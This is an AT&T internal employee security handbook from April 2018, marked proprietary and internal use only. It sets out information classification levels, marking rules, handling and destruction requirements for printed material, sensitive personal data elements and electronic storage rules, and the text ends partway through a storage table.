
Security Fundamentals for AT&T Employees — Issue Date: April 23, 2018 (version 5.2)

Security Fundamentals
for AT&T Employees

Issue Date: April 23, 2018

Page | 1
AT&T Proprietary (Internal Use Only)
Not for use or disclosure outside the AT&T companies except under written agreement
Security Fundamentals for AT&T Employees — Issue Date April 23, 2018 (version 5.1)
Table of Contents
Document Overview ..... 3
  Introduction ..... 3
  What’s NEW! ..... 3
  Document Structure ..... 3
  Background ..... 3
  Source Standards ..... 3
Short Summary ..... 4
  AT&T Information: Classification and Protection ..... 4
  AT&T Information: High Level Policy and Requirements ..... 5
  Customer Data: Categorization and Protection ..... 5
AT&T Information: Classification and Protection ..... 6
  Overview ..... 6
  Information Custodian ..... 6
  Information Classifications ..... 7
  Information Classification Markings ..... 7
  Handling Proprietary Information ..... 8
    AT&T Proprietary (Internal Use Only) Information ..... 8
    “Internal Use Only” Printed Material ..... 9
    AT&T Proprietary (Restricted) ..... 9
    “Restricted” Printed Material ..... 10
    AT&T Proprietary (Secure Restricted) ..... 10
    “Secure Restricted” Printed Material ..... 11
    AT&T Proprietary (Sensitive Personal Information) ..... 11
    “Sensitive Personal Information” Printed Material ..... 14
    Transmitting Electronic Information ..... 19
AT&T Information: High Level Policy and Requirements ..... 22
  Overview ..... 22
  Responsibilities ..... 22
    Compliance ..... 22
    Manager Responsibilities ..... 22
    User Responsibilities ..... 22
    Security Training ..... 22
    Suspicious Activity ..... 22
    Reporting Security Flaws ..... 22
  UserID and Password ..... 23
    AT&T Employee Userid — ATTUID ..... 23
    Password Rules ..... 23
    Unsuccessful Login Attempts ..... 23
  Security on the AT&T Network ..... 24
    Peer-to-Peer File Sharing ..... 24
    Wireless Communication with Peripherals ..... 24
    Email Security ..... 24
    Computer Viruses and Malicious Code ..... 25
    Security Analysis ..... 25
  Personal Computer Security ..... 27
    Obtaining Files or Software ..... 27
    Non-AT&T Owned Software, Hardware and Media ..... 27
    Teleconferencing ..... 28
    Third Party Access to AT&T Resources ..... 29
Information Belonging or Pertaining to Customers of AT&T ..... 29
  Customer Data: Overview ..... 29
  Categorization of Customer Data ..... 29
  Non-Sensitive "Customer Data" Printed Material ..... 30
  Sensitive "Customer Data" Printed Material ..... 31
Summary of Most Recent ASPR Updates (as of April 23, 2018) ..... 34


Document Overview

Introduction
This document is a non-technical presentation and extract of security requirements in AT&T Security Policy and Requirements (ASPR) intended for
all AT&T employees, contractors and agents. The information provided in this document consists of excerpts only. If applicable, please refer to the ASPR
control for full content. It does not supersede official policies, standards or guidelines, but rather includes only information pertinent to every
AT&T employee regardless of level or technical competency. In many places within this document, the actual source documents have other
requirements that are more technical or targeted to specific sub-groups of employees.
Employees, contractors and agents responsible for the technical aspects of securing the AT&T networks or computing systems and applications
must comply with all information security policies published by Chief Security Office (CSO).
In addition to information security standards, employees need to be familiar with the rules for handling official company records published by the
Record and Information Management (RIM) organization.

What’s NEW!
After each publishing cycle—normally twice a year in spring and fall—this document is updated to reflect changes to ASPR. To add value and ease
of reading for our users, we have included a gold star as shown above.

Document Structure
1. Text boxes marked “HINT”, “KEY POINT” or “NOTE” do not come from the source documents listed but are added for clarity or to help
the reader to understand and to comply.
2. Gray bars below paragraph titles or within the text contain references back to the location in the source documents where the
appropriate text originates.

Background
Security is the responsibility of every AT&T employee, contractor and agent. All users must contribute to a safe workplace and all are custodians of
the information they work with even if they are not directly responsible for the security of the networks and devices that contain that information.
Most users work daily with information that AT&T must safeguard from unauthorized access.

Source Standards
The source standards for this document are found in the AT&T Security and Policy Requirements (ASPR) workspace on the eGRC platform. Select
the AT&T Security and Policy Requirements (ASPR) tab.

Short Summary
(For full detail review all content in the document)

AT&T Information: Classification and Protection


1. Protection requirements for data
a. Information valuable to AT&T and to our customers, as well as information requiring protection by law, must be safeguarded
b. AT&T employees and contractors are custodians on behalf of AT&T and its customers to protect classified data and must know how
to protect it.
2. Proprietary data classified in 4 levels of sensitivity
Four levels of classification have been defined for AT&T Proprietary information and data:
Internal Use Only, Restricted, Secure Restricted and Sensitive Personal Information.
a. The four classifications require different levels of control for data storage, distribution, disclosure, and destruction.
b. If the classification is not known, the information must be treated as AT&T Proprietary (Internal Use Only) until the proper
classification is determined.
c. Specific labels and markings have been defined for each of the four (4) data classification levels and indicate the manner in which
documents and media are safeguarded.
d. All hard copy documents (including print outs, copies and faxes), removable media and online applications must display the
appropriate label.
3. Classification – AT&T Proprietary (Internal Use Only)
a. Information that is not intended for public disclosure
b. Information that is valuable to competitors or that can create unintended obligations
c. Internal Use Only information can be shared with others who have a business need (non-AT&T sharing requires a Non-Disclosure
Agreement).
4. Classification – AT&T Proprietary (Restricted)
a. Information that has a higher level of sensitivity
b. Information must be shared only among specifically identifiable persons with a clear business need to know.
c. Restricted information may be shared only with the explicit permission of the originator.
5. Classification – AT&T Proprietary (Secure Restricted)
a. Information with extreme strategic value that if disclosed is likely to damage AT&T's strategic relationships, its ability to launch a
technology/service as planned, or to lose advantage in the marketplace.
— and —
b. Requires an Officer of AT&T to determine the limitations of authorized disclosure (see Access Authorization AT&T Proprietary
(Secure Restricted) Information).
6. Classification – AT&T Proprietary (Sensitive Personal Information)
a. Information that requires a high degree of protection by law
— or —
b. Information that, if made public, could expose individuals to a risk of physical harm, fraud or identity theft
c. Examples of Sensitive Personal Information (SPI) include: bank account number, credit card number, driver’s license number, etc.
See page 13 for the complete list of data elements.
d. Storage, display, and distribution of SPI is subject to special security controls
7. Storing Electronic Information
a. AT&T proprietary information is subject to varied limitations and prohibitions on storage, copying, sharing, or distribution and may
require approvals depending on the level of data classification.
8. Transmission of electronic information
a. Transmitting AT&T electronic information is subject to restrictions and may require encryption depending on the level of data
classification.

AT&T Information: High Level Policy and Requirements
1. All AT&T employees and contractors must comply with the AT&T security standards as set out in the AT&T Security Policy and
Requirements (ASPR) set of documents that are located at http://cso.att.com/ASPRDatabase under the “AT&T Security and Policy
Requirements (ASPR)” tab.
2. All AT&T employees and contractors should annually complete security training as established by CSO and Corporate Compliance.
3. Managers are responsible for confirming business needs for subordinate access to AT&T resources and for ensuring subordinates comply
with ASPR requirements in general.
4. Any potential cyber intrusion, virus or suspicious network activity is to be reported immediately to the ACSIRT team at [email protected],
1-866-466-2288 prompt 8 (US) or 1-908-234-3327 (International), or visit http://security.att.com/Security/IncidentReporting.html
5. All passwords used on AT&T systems must follow a clearly defined set of ASPR requirements and should be managed securely using an
AT&T approved tool, e.g. Password Safe.
6. Peer-to-Peer file sharing must not be used except where a specific set of requirements are met.
7. Any connections of wireless devices, such as personal digital assistants, cell phone wireless headsets, and computer wireless USB
adapters, to AT&T equipment or networks must be in compliance with ASPR.
8. Any storage of AT&T Proprietary information on electronic media or portable devices such as USB thumb drives, personal digital
assistants and digital cameras, must be controlled by AT&T personnel at all times and must be protected in accordance with ASPR.
9. Personnel using AT&T email systems to send AT&T Proprietary information must implement appropriate security controls as defined by
ASPR to protect electronic mail. In addition, email systems must not be used to send/receive chain letters, hoaxes or virus warnings or to
distribute executable files.
10. AT&T provides anti-virus software and instructions for protection of PCs and software in order to protect against viruses and other
malicious programs. PC desktop support can be contacted for assistance.
11. All software used on AT&T owned and managed systems must be approved for use, be properly licensed, be obtained from trusted
sources and be confirmed to be free from viruses and malicious code. All software must be TSS-approved (http://tss.att.com/home.cfm)
unless a TSS exception has been approved prior to use.
12. AT&T owned hardware and software should always be used wherever possible. Any non-AT&T owned hardware and software used to
support AT&T must be authorized for use and must follow ASPR defined requirements.

Customer Data: Categorization and Protection


1. Customer Data refers to the data belonging to a customer of AT&T. It includes all information handled, stored or transmitted by AT&T
under contract or terms and conditions on behalf of the customer, but excludes all customer details. It includes user generated content.
2. Since the content of Customer Data is not normally known by AT&T, certainly not on a per item basis, the sensitivity for all Customer Data
that is part of a defined service or service subset must be considered the same.

AT&T Information: Classification and Protection
Overview
While working for AT&T, employees, contractors, suppliers and others learn information that AT&T regards as valuable or sensitive. Some of that
information is valuable because it gives AT&T advantages over competing businesses. Information may be regarded as sensitive because it is
personal information about customers or employees. Some information must be protected by law [e.g. US Federal Communications Commission
(FCC) regulations, US Health Insurance Portability and Accountability Act (HIPAA)] or to comply with external standards [e.g. Payment Card Industry
(PCI) Data Security Standards (DSS)]. Employees must know how to protect all this information as required by the company.
AT&T has defined four classifications for its business information along with rules for protecting that information in ASPR-0463: Information
Classification.

Information Custodian
Content Source: ASPR-0190: Custodian
KEY POINT: While AT&T officially and legally owns all its proprietary information, you are a custodian of that information. Both the well-being of
the company and your success on the job depend on how well you perform that role. This applies even to information you may gain by accident.

When an AT&T employee, contractor or agent receives and retains AT&T Proprietary information or customer data, he or she becomes a custodian
of that information and is responsible for protecting its confidentiality, integrity and availability according to the rules and regulations established
by the originator. At a minimum, the custodian is responsible for:
1. Complying with Records & Information Management (see ASPR-0191: Records and Information Management) program guidelines on
retention and disposal of company records and information.
2. Providing proper safeguards for the information, including following guidelines in this practice for proper disposal.
3. In those cases where information must be printed from electronic media, the custodian must mark the printed information with the
appropriate classification.
4. Providing proper safeguards for processing equipment, information storage, backup, and recovery.
5. Providing a secure processing environment that can adequately protect the integrity, confidentiality, and availability of information.
6. Administering access requests to information properly authorized by the originator.
7. Using the information only for the purpose intended.
8. Maintaining the integrity, confidentiality, and availability of information accessed.
Being granted access to information does not imply or confer authority to grant other users access to that information beyond the normal
boundaries established for a given classification. This is true whether the information is electronically held, printed, hardcopy, manually prepared,
copied or transmitted.

Information Classifications
Content Source: ASPR-0463: Information Classification
Information classification is the framework for evaluating and protecting information and assets that contain information owned and used by the
AT&T companies. Information is categorized into four (4) classifications based on the sensitivity, legal requirement and competitive value of the
information.
All types of information are subject to these requirements, including, but not limited to:
• Data in production, test, or development environments,
• Archives,
• Backups,
• Downloaded data,
• Personal computer files,
• Emails
— and —
• Hard copy documents.
Furthermore, all information must be classified and protected according to this policy irrespective of the form it may take. In particular, this
covers all types of hardcopy or printed material, electronic data, and information that is spoken or recorded in any way.
The four Information Classifications are:
1. AT&T Proprietary (Internal Use Only)
2. AT&T Proprietary (Restricted)
3. AT&T Proprietary (Secure Restricted)
4. AT&T Proprietary (Sensitive Personal Information).

Content Source: ASPR-0154: Default Classification


If the classification of information is unknown, the information must be treated as AT&T Proprietary (Internal Use Only) until the proper
classification is determined.

HINT: There’s a web page tool to help you determine the classification of information.

Information Classification Markings


Content Source: ASPR-0161, ASPR-0162, ASPR-0163, ASPR-0212, ASPR-1017
KEY POINT: Although there are four (4) classifications of proprietary information, there are more than four (4) markings with the choice of
marking depending on the use of the information and the media of presentation. When in doubt, these markings can all be found at
http://cso.att.com/IC/Markings.html and helpful FAQs on this are at http://cso.att.com/ASPR/InfoClassificationFAQ.html. There is no marking for
public information.

The labels and markings of documents and media influence the manner in which they are safeguarded. They alert information custodians to the
sensitivity of the documents, displays and media so that they can be appropriately secured to the respective requirements.
All hard copy documents (including print outs, copies and faxes), removable media and online applications must display the appropriate label
according to the highest classification of data contained. All company emails containing AT&T proprietary data must also be appropriately classified
and marked. (See ASPR-0209: Specific Markings – 2. E-mail Marking and Footer.) Customer data is not required to display any form of AT&T
marking.
Unmarked information does not necessarily mean that the information should not be classified. A failure to classify or mark information does not:
• Authorize the release of the unmarked proprietary information.
• Decrease the requirements for safeguarding it from unauthorized use, modification, destruction or disclosure.

AT&T Proprietary (Internal Use Only)
  Not for use or disclosure outside the AT&T companies except under written agreement

AT&T Proprietary (Restricted)
  Only for use by authorized individuals or any above-designated team(s) within the AT&T companies and not for general distribution
— OR —
AT&T Proprietary (Restricted) — “Team”
  Only for use by authorized individuals or any above-designated team(s) within the AT&T companies and not for general distribution

AT&T Proprietary (Secure Restricted)
  Only for use by authorized individuals as approved by an Officer of the AT&T Companies

AT&T Proprietary (Sensitive Personal Information)
  Only for use by authorized individuals in accordance with requirements for specific data categories predefined in Company security standards
  for Information Classification and Protection
NOTE: If a “Team” is designated by the originator, the title of the marking would be revised to include the name of the identified team.

NOTE: ASPR permits local language markings in addition to English required markings. See ASPR-1017: Labels and Marking.

HINT: Here’s a copy and paste web page for the marking(s) you need.

Handling Proprietary Information

AT&T Proprietary (Internal Use Only) Information


Content Source: ASPR-0151: AT&T Proprietary (Internal Use Only)
Description
• Information that is proprietary and not intended for public disclosure, whose value could be diminished if publicly disclosed,
— or —
• Information that could be valuable to competitors or create unintended obligations or liabilities for AT&T if revealed outside the
company,
— or —
• Information that is intended for all employees or authorized contractors or is of such a nature that it is in the company’s interest to allow
any employee to determine if there is a business need to share it with any other employee.

Content Source: ASPR-0158: Access Authorization to AT&T Proprietary (Internal Use Only) Information
Internal Use Only information may be shared with any employee with a business need, and may be shared with any non-payroll worker (e.g.
contractor) who is authorized under a Non-Disclosure Agreement.
Modification of this information must be limited to authorized persons because of the potentially wide distribution of this information.

“Internal Use Only” Printed Material
Content Source: ASPR-0170, ASPR-0171, ASPR-0172, ASPR-0173, ASPR-0174
Activity: Use and storage
  Inside AT&T controlled space:
    • Should be kept away from visitors who have no right to see the information.
    • Not necessary to keep hidden or physically secured when unattended.
  Outside AT&T controlled space:
    • Must be secured from unauthorized access.
    • Must be kept in the direct supervision of the custodian or physically secured (e.g. desk, filing cabinet, safe, car trunk/boot, hotel room safe).
    • Must not leave the direct supervision of the custodian when traveling on public transport (e.g. taxi trunk/boot, bus hold/baggage storage,
      checked baggage on airplane).

Activity: Printing & copying
  Inside AT&T controlled space:
    • No specific restrictions.
  Outside AT&T controlled space:
    • Must supervise the printer or copier with a person authorized for the information.

Activity: Distribution
  Inside AT&T controlled space:
    • No specific controls required when distribution is entirely within AT&T controlled space.
  Outside AT&T controlled space:
    • Must use a sealed envelope whenever delivery is to a location external to AT&T controlled space or whenever the delivery utilizes
      non-AT&T personnel or service.

Activity: Fax
  Inside AT&T controlled space:
    • Should include a fax transmittal sheet.
  Outside AT&T controlled space:
    • Should include a fax transmittal sheet.
    • Must supervise fax machines that are located outside AT&T controlled space with authorized personnel.

Activity: Destruction
  Inside AT&T controlled space:
    • Must use special bins provided or shred.
  Outside AT&T controlled space:
    • Must shred.

AT&T Proprietary (Restricted)


Content Source: ASPR-0152: AT&T Proprietary (Restricted)
Description
• Information that has a higher level of sensitivity and which the originator determines must be shared only among specifically identifiable
persons or team with a clear business need to know
— or —
• Information that requires a high degree of protection by law and loss or unauthorized disclosure could require notification by the
company to government agencies, individuals or law enforcement
— or —
• Information that, if revealed widely within the company, could present an increased risk of compromising computer systems, fraud or
increased probability of disrupting the day to day operation of the business.

Content Source: ASPR-0159: Access Authorization to AT&T Proprietary (Restricted) Information


Restricted information may be shared only with the explicit permission of the originator.
The originator may designate a specific department, discrete group of employees or other “Team” within the title of the marking (e.g. “AT&T
Proprietary (Restricted) – Procurement Team”) to have access to information. Such a team may be an organization, a project group or other well
defined work group that may cross lines among more formal organizations. Team or group designations must be clear enough so that the team or
group members know who they are and understand the meaning well enough that they can keep the information away from unauthorized
persons. Ad hoc teams should not be used; however, project teams whose members are clearly defined may be. Where the valid members of the
team or group cannot be readily identified, the document must contain a paragraph describing how to determine the team membership.
If restricted information is to be shared among a designated group or team, members of the group or team may not pass on or discuss the
information with anyone other than “Team” members without the approval of the originator.
The right to read this information is limited to those individuals authorized by the data originator. Permission should be in writing. Email is
acceptable.
Modification of information designated for disclosure to a specific group or team must be limited to authorized persons who are members of the
group or team.

“Restricted” Printed Material
Content Source: ASPR-0170, ASPR-0171, ASPR-0172, ASPR-0173, ASPR-0174
Activity: Use and storage
  Inside AT&T controlled space:
    • Must be kept away from casual observers.
    • Must be kept in the direct supervision of the custodian or physically secured (e.g. desk, filing cabinet, safe).
    • If the controlled space is only accessible to the designated "Team", it is not necessary to keep hidden or physically secured when unattended.
  Outside AT&T controlled space:
    • Must be kept away from casual observers.
    • Must be kept in the direct supervision of the custodian or physically secured (e.g. desk, filing cabinet, safe, car trunk/boot, hotel room safe).
    • Must not leave the direct supervision of the custodian when traveling on public transport (e.g. taxi trunk/boot, bus hold/baggage storage,
      checked baggage on airplane).

Activity: Printing & copying
  Inside AT&T controlled space:
    • Must supervise the printer or copier
    — or —
    • Must print/copy in an office/area where access is limited to authorized personnel.
  Outside AT&T controlled space:
    • Must supervise the printer or copier with a person authorized for the information.

Activity: Distribution
  Inside AT&T controlled space:
    • Should be hand delivered by originator or custodian.
    • Should use double envelopes with the inner envelope marked "Private" when using AT&T internal mail.
    • The proprietary banner must not be visibly displayed on the envelopes.
  Outside AT&T controlled space:
    • Must use at least a single sealed envelope.
    • Should, with the exception of (a) individual customer information sent to that customer, and (b) individual employee information sent to
      that employee:
      I. Use double envelopes with the inner envelope marked "Private"
      — and —
      II. Be possible to track the package along its route
      — and —
      III. Be signed for upon delivery, whenever delivery is to a location external to AT&T controlled space or whenever the delivery utilizes
      non-AT&T personnel or service.
    • The proprietary banner must not be visibly displayed on the envelopes.

Activity: Fax
  Inside AT&T controlled space:
    • Must verify receiving fax number.
    • Should include a fax transmittal sheet.
    • Must supervise sending and receiving fax machines with authorized personnel, or use fax machines in offices/areas where access is
      limited to authorized personnel.
  Outside AT&T controlled space:
    • Must verify receiving fax number.
    • Should include a fax transmittal sheet.
    • Must supervise fax machines that are located outside AT&T controlled space with authorized personnel.

Activity: Destruction
  Inside AT&T controlled space:
    • Must use special bins provided or shred.
  Outside AT&T controlled space:
    • Must shred.

AT&T Proprietary (Secure Restricted)


Content Source: ASPR-0211: AT&T Proprietary (Secure Restricted)
Description
• Information with extreme strategic value that if disclosed is likely to damage AT&T's strategic relationships, its ability to launch a
technology/service as planned, or to lose advantage in the marketplace
— and —
• Requires an Officer of AT&T (Level 6 or higher) to determine the limitations of authorized disclosure (see ASPR-0215: Access
Authorization to AT&T Proprietary (Secure Restricted) Information).

Content Source: ASPR-0215: Access Authorization to AT&T Proprietary (Secure Restricted) Information
AT&T Proprietary (Secure Restricted) information may only be shared with individuals who have been explicitly authorized.
Each individual requiring access to AT&T Proprietary (Secure Restricted) information must be authorized by an Officer of AT&T (level 6 or higher)
or a designated delegate of an Officer of AT&T (level 6 or higher) prior to being permitted such access. Any delegation of responsibility must be to
a named individual in writing (email is acceptable). Parameters for authorizing individuals must be established as part of any delegation (e.g. to
include only additional AT&T members). Any change to the parameters that have been delegated (e.g. ability to add non-AT&T members) must
again be in writing (email is acceptable) from the Officer of AT&T (level 6 or higher).

“Secure Restricted” Printed Material

Content Source: ASPR-0170, ASPR-0171, ASPR-0172, ASPR-0173, ASPR-0174

Activity: Use and storage
  Inside AT&T controlled space:
    Must be kept away from casual observers.
    Must be kept in the direct supervision of the custodian or physically secured (e.g. desk, filing cabinet, safe).
  Outside AT&T controlled space:
    Should never be taken outside AT&T controlled space. If there is an overriding business need then:
    a. Must obtain, and retain, written approval from an Officer of AT&T (Level 6 or higher).
    b. Must be kept away from casual observers.
    c. Must be kept in the direct supervision of the custodian or physically secured (e.g. desk, filing cabinet, safe, car trunk/boot, hotel room safe).
    d. Must not leave the direct supervision of the custodian when traveling on public transport (e.g. taxi trunk/boot, bus hold/baggage storage, checked baggage on airplane).

Activity: Printing & copying
  Inside AT&T controlled space:
    Must supervise the printer or copier
    — or —
    Must print/copy in an office/area where access is limited to authorized personnel.
  Outside AT&T controlled space:
    Must not print/copy outside AT&T controlled space.

Activity: Distribution
  Inside AT&T controlled space:
    Should be hand delivered by the originator or custodian. If hand delivery is not feasible then:
    i. Approval must be obtained from an Officer of AT&T (Level 6 or higher).
    ii. Must use double envelopes with the inner envelope marked "Private", and be possible to track the package along its route, and be signed for upon delivery.
    iii. The proprietary banner must not be visibly displayed on the envelopes.
    iv. Following the expected delivery timeframe the sender must confirm safe receipt.
  Outside AT&T controlled space:
    Should never be taken outside AT&T controlled space. If there is an overriding business need then:
    i. Should hand deliver by the originator or custodian. If hand delivery is not feasible then:
       i. Approval must be obtained from an Officer of AT&T (Level 6 or higher).
       ii. Must use double envelopes with the inner envelope marked "Private", and be possible to track the package along its route, and be signed for upon delivery.
       iii. The proprietary banner must not be visibly displayed on the envelopes.
       iv. Following the expected delivery timeframe the sender must confirm safe receipt.

Activity: Fax
  Inside AT&T controlled space: Must not be faxed.
  Outside AT&T controlled space: Must not be faxed.

Activity: Destruction
  Inside AT&T controlled space: Must shred.
  Outside AT&T controlled space: Must shred.

AT&T Proprietary (Sensitive Personal Information)

Content Source: ASPR-0153: AT&T Proprietary (Sensitive Personal Information)
Description
• Information that requires a high degree of protection by law and whose loss or unauthorized disclosure would require notification by the company to government agencies, individuals or law enforcement
— or —
• Information that, if made public, could expose individuals to a risk of physical harm, fraud or identity theft.

KEY POINT: The specific data elements listed below must be classified and protected as AT&T Proprietary (Sensitive Personal Information). Complete descriptions for these data elements can be found in ASPR-0206: Pre-Classified Data Elements.

Content Source: ASPR-0206: Pre-Classified Data Elements

Table: Data Elements defined as AT&T Proprietary (Sensitive Personal Information)
• Driver’s License Number
• Taxpayer Identification Number
• U.S. Social Security Number (SSN)
• Nationally Issued Identification Number
• State or Province-issued Identification Number
• Payment Card Number (includes debit and pre-paid cards)
• Payment Card Security Data
• Background Checks*
• Bank Account Number
• Customer Authentication Credentials
• Customer Authentication Number Hints
• Location Based Information (LBI)
• Date of Birth: An individual's full and complete DOB, i.e. including Month, Day and Year. Excludes partial DOB where only Month and Day are used without Year. This element contains two factors, both of which must be present and able to be associated with each other:
  1. A full and complete DOB
  — and —
  2. The individual's identity, either explicitly or via a unique identifier that can be linked to that individual.
• Biometric Data
• Criminal History (Subject to non-U.S. jurisdiction)
• Racial or Ethnic Origin (Subject to non-U.S. jurisdiction)
• Trade Union Membership (Subject to non-U.S. jurisdiction)
• Information Related to an Individual’s Political Affiliation, Religious Belief or Sexual Orientation (Subject to non-U.S. jurisdiction)
• U.S. Protected Health Information (PHI)
• Medical and Health Information (Subject to non-U.S. jurisdiction)
• Genetic Information*

*Note: Pre-existing data stores holding this data element have until 16th April 2019 to comply with all applicable AT&T Proprietary (Sensitive Personal Information) requirements.

Table: Customer Privacy – The following “Privacy” related data elements have been pre-classified as follows when they apply to a customer.
(Columns: Data Element; Description; Customer Information Type; Classification / Categorization)

Data Element: Customer Web Browsing History
  Description: Information about what websites our customers visit and applications they use on our network (wireline and wireless including Wi-Fi); this does not include browsing and activities associated with customers' use of official AT&T corporate websites or history captured at the network level prior to “processing” (e.g. raw data streams not associated with a customer).
  Customer Information Type: Customer Details
  Classification / Categorization: AT&T Proprietary (Sensitive Personal Information)

Data Element: Customer Viewing History
  Description: Information about programs watched or recorded, games and applications used, etc. (e.g. DIRECTV® (DTV) Set Top Box viewing, DIRECTV NOW® viewing)
  Customer Information Type: Customer Details
  Classification / Categorization: AT&T Proprietary (Sensitive Personal Information)

Data Element: Customer “messaging” content
  Description: Including: Email, text messages, conference call recording, and voice mail call recording. Excluding: “Messaging” between customers and AT&T in conducting official AT&T corporate business. Any other data.
  Note: Pre-existing data stores holding this data element (except for customer email and customer text message) have until 16th April 2019 to comply with all applicable Sensitive Customer Data requirements.
  Customer Information Type: Customer Data
  Classification / Categorization: Sensitive Customer Data

Data Element: Metadata relating to customer “messaging” (as defined above)
  Description: For example: Email recipients address, text message recipients phone number, conference call attendees phone number, voice mail recipients phone number.
  Customer Information Type: Customer Details
  Classification / Categorization: Restricted Personal Information

Data Element: Customer Telemetry Data, Customer Use
  Description: Automated communications for monitoring by the customer (rather than AT&T). Including all data that is generated by our customers' use of the Digital Life® service or any other IoT service that is used by the customer to monitor or control the service. For example, video files.
  Note: Pre-existing data stores holding this data element (except for Digital Life data) have until 16th April 2019 to comply with all applicable Sensitive Customer Data requirements.
  Customer Information Type: Customer Data
  Classification / Categorization: Sensitive Customer Data

Data Element: Customer Telemetry Data, AT&T Use
  Description: Automated communications for monitoring by AT&T. Including all data that is generated by our customers' use of the Digital Life® service or any other IoT service that is used by AT&T to monitor or control the service. For example, IoT temperature settings that trigger automated AT&T notifications to the customer.
  Customer Information Type: Customer Details
  Classification / Categorization: Restricted Personal Information

Data Element: Customer Usage information for device resident applications
  Description: Information about usage for applications on our customers' devices transmitted on our network.
  Customer Information Type: Customer Details
  Classification / Categorization: Restricted Personal Information

Data Element: Customer Web communications payload, Customer Use
  Description: Under normal operation.
  Customer Information Type: Customer Data
  Classification / Categorization: Not pre-classified. See ASPR-0579: Information Belonging to a Customer of AT&T.

Data Element: Customer Web communications payload, AT&T Use
  Description: When captured as part of service analysis, e.g. Deep Packet Inspection (DPI) data. See ASPR-0094: Data Capture and Testing.
  Note: Pre-existing data stores holding this data element have until 16th April 2019 to comply with all applicable AT&T Proprietary (Sensitive Personal Information) requirements.
  Customer Information Type: Customer Details
  Classification / Categorization: AT&T Proprietary (Sensitive Personal Information)

Data Element: Other customer generated content
  Description: Any data intended for use by the customer rather than AT&T. For example, video, calendar, contacts.
  Customer Information Type: Customer Data
  Classification / Categorization: Not pre-classified. See ASPR-0579: Information Belonging to a Customer of AT&T.

Content Source: ASPR-0160: Access Authorization to AT&T Proprietary (Sensitive Personal Information)
AT&T Proprietary (Sensitive Personal Information) information may only be shared with the explicit permission of the originator.
The right to read or modify this information is limited to those individuals authorized by the data originator.

“Sensitive Personal Information” Printed Material
Content Source: ASPR-0170, ASPR-0171, ASPR-0172, ASPR-0173, ASPR-0174

Activity: Use and storage
  Inside AT&T controlled space:
    Must be kept away from casual observers.
    Must be kept in the direct supervision of the custodian or physically secured (e.g. desk, filing cabinet, safe).
  Outside AT&T controlled space:
    Should never be taken outside AT&T controlled space. If there is an overriding business need then:
    a. Must obtain, and retain, written approval from an Officer of AT&T (Level 6 or higher).
    b. Must be kept away from casual observers.
    c. Must be kept in the direct supervision of the custodian or physically secured (e.g. desk, filing cabinet, safe, car trunk/boot, hotel room safe).
    d. Must not leave the direct supervision of the custodian when traveling on public transport (e.g. taxi trunk/boot, bus hold/baggage storage, checked baggage on airplane).

Activity: Printing & copying
  Inside AT&T controlled space:
    Must supervise the printer or copier
    — or —
    Must print/copy in an office/area where access is limited to authorized personnel.
    Should mask or obscure AT&T Proprietary (Sensitive Personal Information) data elements from view unless required by the business process.
  Outside AT&T controlled space:
    Should not print/copy outside AT&T controlled space. If there is an overriding business need then:
    Must supervise the printer or copier with a person authorized for the information.
    Should mask or obscure AT&T Proprietary (Sensitive Personal Information) data elements from view unless required by the business process.

Activity: Distribution
  Inside AT&T controlled space:
    Should be hand delivered by the originator or custodian. If hand delivery is not feasible then:
    I. Approval must be obtained from an Executive Director (Level 4).
    II. Must use double envelopes with the inner envelope marked "Private", and be possible to track the package along its route, and be signed for upon delivery.
    The proprietary banner must not be visibly displayed on the envelopes.
    Following the expected delivery timeframe the sender must confirm safe receipt.
  Outside AT&T controlled space:
    Should not be distributed outside AT&T controlled space except for mailing individual customer bills, which include customer PINs, for use when obtaining Customer Service via telephone.
    In all other cases if there is an overriding business need then:
    I. Should hand deliver by the originator or custodian. If hand delivery is not feasible then approval must be obtained from an Executive Director (Level 4).
    II. Must use double envelopes with the inner envelope marked "Private", and be possible to track the package along its route, and be signed for upon delivery.
    III. The proprietary banner must not be visibly displayed on the envelopes.

Activity: Fax
  Inside AT&T controlled space:
    Should not be faxed. If there is an overriding business need then:
    • Must obtain approval from an Executive Director (Level 4). Approval must be retained for a period of time consistent with RIM (see ASPR-0191: Records and Information Management (RIM)).
    • Must verify receiving fax number.
    • Should include a fax transmittal statement.
    • Must only use fax machines that are supervised with authorized personnel, or are located in offices/areas where access is limited to authorized personnel, or validated within a business process.
    Where faxing to a supervised machine, upon completion the sender must confirm safe receipt.
  Outside AT&T controlled space:
    Should not be faxed. If there is an overriding business need then:
    • Must obtain approval from an Executive Director (Level 4). Approval must be retained for a period of time consistent with RIM (see ASPR-0191: Records and Information Management (RIM)).
    • Must verify receiving fax number.
    • Should include a fax transmittal statement.
    • Must only use fax machines that are supervised with authorized personnel, or are located in offices/areas where access is limited to authorized personnel, or validated within a business process.
    Where faxing to a supervised machine, upon completion the sender must confirm safe receipt.

Activity: Destruction
  Inside AT&T controlled space: Must shred.
  Outside AT&T controlled space: Must shred.

Storing Electronic Information


Content Source: ASPR-0176: Storage of Electronic Data
AT&T information is stored on many types of media and electronic devices, sometimes inside and sometimes outside of AT&T controlled space.
However,
1. AT&T proprietary information or Customer data must not be stored on electronic media or devices that are not controlled by either AT&T or those under contract to AT&T (see ASPR-0113: Non-AT&T Owned Software, Hardware and Media).
2. AT&T proprietary information must not be placed on computer workstations that are available for shared use in visitor centers, public
computing facilities and similar environments.
3. The storage of authentication credentials is subject to ASPR-0444: Authentication Credential Protection and ASPR-0443: Two Factor
Authentication Credentials.

The following table defines on which types of media and devices AT&T information can and cannot be stored; and what other additional controls,
such as encryption are required when “at rest”.
(Columns: Location; AT&T Proprietary (Internal Use Only); AT&T Proprietary (Restricted))

Location: Systems solely within AT&T controlled space
  AT&T Proprietary (Internal Use Only): Encryption not required.
  AT&T Proprietary (Restricted): Should store non-transient data encrypted.

Location: Portable External Storage Devices (excluding Mobile Computing Devices) or Removable Portable Media
  AT&T Proprietary (Internal Use Only): Encryption not required.
  AT&T Proprietary (Restricted):
    Should not be copied from primary sources and stored on such media unless there is a business need.
    Where there is a business need
    1. Must store encrypted, with the exception of
       a. Media that remains in AT&T controlled space as part of a documented business process,
       — or —
       b. Individual customer information for shipping to customers on electronic media.

Location: Mobile Computing Devices
  AT&T Proprietary (Internal Use Only): Encryption not required.
  AT&T Proprietary (Restricted):
    Must not be stored except where there is a business need.
    Where there is a business need then written approval must be obtained (and retained) from an Officer of AT&T (level 6 or higher), and must store non-transient data encrypted.
    If a user receives AT&T Proprietary (Secure Restricted) data in an unsolicited fashion (e.g. by email) and is not compliant with all of the above, then the user must delete the data immediately.

Location: Systems/devices permanently or temporarily outside AT&T Controlled Spaces (excluding "Mobile computing devices")
